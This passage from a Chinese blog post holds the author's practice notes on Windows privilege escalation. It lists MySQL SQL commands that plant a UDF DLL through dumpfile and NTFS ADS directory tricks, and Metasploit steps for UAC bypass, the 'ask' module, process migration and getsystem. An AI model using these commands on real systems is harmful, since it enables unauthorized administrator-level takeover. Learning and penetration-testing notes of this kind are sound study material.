<p>2、查看是否有导入导出权限<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like &apos;secure_file_priv&apos;;</span><br></pre></td></tr></table></figure></p>
<p>查看是否为空(只有为空才有任意导入导出权限)     </p>
<p>3、可以直接将函数内容导出到指定位置的dll文件中<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select to_base64(load_file(&apos;/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll&apos;)) into dumpfile &apos;/tmp/udf.b64&apos;;</span><br><span class="line"></span><br><span class="line">select from_base64(&quot;&lt;base64_data&gt;&quot;) into dumpfile &quot;D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll&quot;;</span><br></pre></td></tr></table></figure></p>
<p><code>to_base64</code>和<code>from_base64</code>在mysql5.6以上版本提供。     </p>
<p>也可以先将该文件的二进制数据编码为十六进制，然后再解码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select hex(load_file(&apos;D:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\lib_mysqludf_sys_64.dll&apos;));</span><br><span class="line"></span><br><span class="line">select unhex(data) into dumpfile &apos;D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll&apos;;</span><br></pre></td></tr></table></figure></p>
<p>4、默认情况plugin目录不存在<br>利用NTFS ADS流来创建文件夹:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">select @@basedir;   </span><br><span class="line">//查找到mysql的目录</span><br><span class="line"></span><br><span class="line">select &apos;It is dll&apos; into dumpfile &apos;D:\\phpStudy\\PHPTutorial\\MySQL\\lib::$INDEX_ALLOCATION&apos;;   </span><br><span class="line">//利用NTFS ADS创建lib目录</span><br><span class="line"></span><br><span class="line">select &apos;It is dll&apos; into dumpfile &apos;D:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION&apos;;</span><br><span class="line">//利用NTFS ADS创建plugin目录</span><br></pre></td></tr></table></figure></p>
<h4 id="参考文章-1"><a href="#参考文章-1" class="headerlink" title="参考文章"></a>参考文章</h4><p><a href="https://www.cnblogs.com/h4ck0ne/p/5154604.html" target="_blank" rel="noopener">MYSQL提权总结</a><br><a href="https://www.freebuf.com/articles/system/163144.html" target="_blank" rel="noopener">利用MySQL UDF进行的一次渗透测试</a>   </p>
<h3 id="绕过UAC提权"><a href="#绕过UAC提权" class="headerlink" title="绕过UAC提权"></a>绕过UAC提权</h3><p>在msf里面获取到一个低权限的shell后，使用绕过uac进行提权   </p>
<p><a href="https://baike.baidu.com/item/%E7%94%A8%E6%88%B7%E8%B4%A6%E6%88%B7%E6%8E%A7%E5%88%B6/8084230?fromtitle=uac&amp;fromid=895573&amp;fr=aladdin" target="_blank" rel="noopener">百度百科：什么是UAC？</a>    </p>
<p>粗俗理解：UAC是对用户权限控制的功能，绕过UAC相当于绕过权限验证   </p>
<p>具体权限提升如何实现暂时不深究。   </p>
<h4 id="利用步骤"><a href="#利用步骤" class="headerlink" title="利用步骤"></a>利用步骤</h4><p>1、在msf中有一个低权限的meterpreter会话<br><img src="https://k-ring.github.io/img/windows14.jpg" alt>   </p>
<p>2、将meterpreter会话放到后台运行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; bg</span><br><span class="line">或者</span><br><span class="line">meterpreter&gt;background</span><br></pre></td></tr></table></figure></p>
<p>3、加载绕过UAC提权模块   </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; use exploit/windows/local/bypassuac</span><br><span class="line">&gt; set session 23</span><br><span class="line">&gt; exploit</span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/windows15.jpg" alt>   </p>
<p>提权成功的话会返回一个meterpreter会话，但是使用getuid还是低权限用户   </p>
<p>使用<code>ps</code>查看进程中是否存在SYSTEM权限运行的进程   </p>
<p>存在这样一个进程   </p>
<p><img src="https://k-ring.github.io/img/windows16.jpg" alt>  </p>
<p>4、迁移进程<br>使用<code>migrate</code>命令将进程迁移到SYSTEM权限运行的进程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">migrate 8604</span><br></pre></td></tr></table></figure></p>
<p>或者可以直接使用命令<code>getsystem</code>提升权限   </p>
<p>5、再使用<code>getuid</code>查看权限，成为了SYSTEM权限    </p>
<h3 id="提高程序运行级别（runas）"><a href="#提高程序运行级别（runas）" class="headerlink" title="提高程序运行级别（runas）"></a>提高程序运行级别（runas）</h3><p>以高权限重启一个返回式的shellcode，但是没有绕过UAC，会触发用户的UAC，只有当用户点击<code>是</code>之后才会返回一个高权限shell   </p>
<h4 id="利用步骤-1"><a href="#利用步骤-1" class="headerlink" title="利用步骤"></a>利用步骤</h4><p>利用方式和前面相似，只是用的模块不一样<br>前面部分操作省略。。。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; use exploit/windows/local/ask</span><br><span class="line">&gt; set session 23</span><br><span class="line">&gt; exploit</span><br></pre></td></tr></table></figure></p>
<p><strong>等待用户点击确认后会返回一个meterpreter会话</strong>   </p>
<p>使用命令 <code>getsystem</code> 提升权限。    </p>
<h2 id="寻找其他的一系列ms漏洞提权"><a href="#寻找其他的一系列ms漏洞提权" class="headerlink" title="寻找其他的一系列ms漏洞提权"></a>寻找其他的一系列ms漏洞提权</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; use exploit/windows/local/ms[tab]</span><br></pre></td></tr></table></figure>
<h2 id="其他提权方式"><a href="#其他提权方式" class="headerlink" title="其他提权方式"></a>其他提权方式</h2><p>参考文末的文章</p>
<h2 id="参考文章-2"><a href="#参考文章-2" class="headerlink" title="参考文章"></a>参考文章</h2><ul>
<li><a href="https://xz.aliyun.com/t/2519#toc-16" target="_blank" rel="noopener">Windows提权笔记</a>   </li>
<li><a href="https://www.freebuf.com/news/141335.html" target="_blank" rel="noopener">攻击者侵入系统后如何提升账户权限：提权技术详细分析</a>  </li>
<li><a href="https://www.t00ls.net/articles-49501.html" target="_blank" rel="noopener">Windows下命令行下载文件总结</a></li>
<li><a href="https://www.cnblogs.com/wh4am1/p/6602650.html" target="_blank" rel="noopener">metasploit下Windows下多种提权方式</a></li>
</ul>
<h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>因为对计算机底层实现服务的原理不是很清楚，接触起来也比较吃力，导致很多由服务提权的方式都没有成功复现，不知道从何下手，暂时就先复现这部分，待以后技艺增长再行复现。     </p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/windows/" rel="tag"># windows</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/24/绕过disable_functions方法复现/" rel="next" title="绕过disable_functions方法复现与总结">
                <i class="fa fa-chevron-left"></i> 绕过disable_functions方法复现与总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/09/端口转发和socks代理工具学习/" rel="prev" title="端口转发和socks代理工具学习">
                端口转发和socks代理工具学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">故人梦</p>
              <p class="site-description motion-element" itemprop="description">人的一生应该这样度过:不因虚度年华而悔恨，也不因碌碌无为而羞愧</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows提权命令记录"><span class="nav-number">2.</span> <span class="nav-text">Windows提权命令记录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#本地提权exp"><span class="nav-number">3.</span> <span class="nav-text">本地提权exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#通过系统服务提权"><span class="nav-number">4.</span> <span class="nav-text">通过系统服务提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#不带引号的服务路径"><span class="nav-number">4.1.</span> <span class="nav-text">不带引号的服务路径</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞利用"><span class="nav-number">4.1.1.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#需要条件"><span class="nav-number">4.1.2.</span> <span class="nav-text">需要条件</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#不安全的服务权限"><span class="nav-number">4.2.</span> <span class="nav-text">不安全的服务权限</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#提权原理"><span class="nav-number">4.2.1.</span> <span class="nav-text">提权原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用过程"><span class="nav-number">4.2.2.</span> <span class="nav-text">利用过程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考文章"><span class="nav-number">4.2.3.</span> <span class="nav-text">参考文章</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用总结"><span class="nav-number">4.2.4.</span> <span class="nav-text">利用总结</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UDF提权"><span class="nav-number">4.3.</span> <span class="nav-text">UDF提权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#通过webshell上传文件"><span class="nav-number">4.3.1.</span> <span class="nav-text">通过webshell上传文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过注入生成udf-dll文件"><span class="nav-number">4.3.2.</span> <span class="nav-text">通过注入生成udf.dll文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考文章-1"><span class="nav-number">4.3.3.</span> <span class="nav-text">参考文章</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过UAC提权"><span class="nav-number">4.4.</span> <span class="nav-text">绕过UAC提权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#利用步骤"><span class="nav-number">4.4.1.</span> <span class="nav-text">利用步骤</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#提高程序运行级别（runas）"><span class="nav-number">4.5.</span> <span class="nav-text">提高程序运行级别（runas）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#利用步骤-1"><span class="nav-number">4.5.1.</span> <span class="nav-text">利用步骤</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找其他的一系列ms漏洞提权"><span class="nav-number">5.</span> <span class="nav-text">寻找其他的一系列ms漏洞提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#其他提权方式"><span class="nav-number">6.</span> <span class="nav-text">其他提权方式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考文章-2"><span class="nav-number">7.</span> <span class="nav-text">参考文章</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#结束语"><span class="nav-number">8.</span> <span class="nav-text">结束语</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">故人梦</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">42.5k</span>
  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
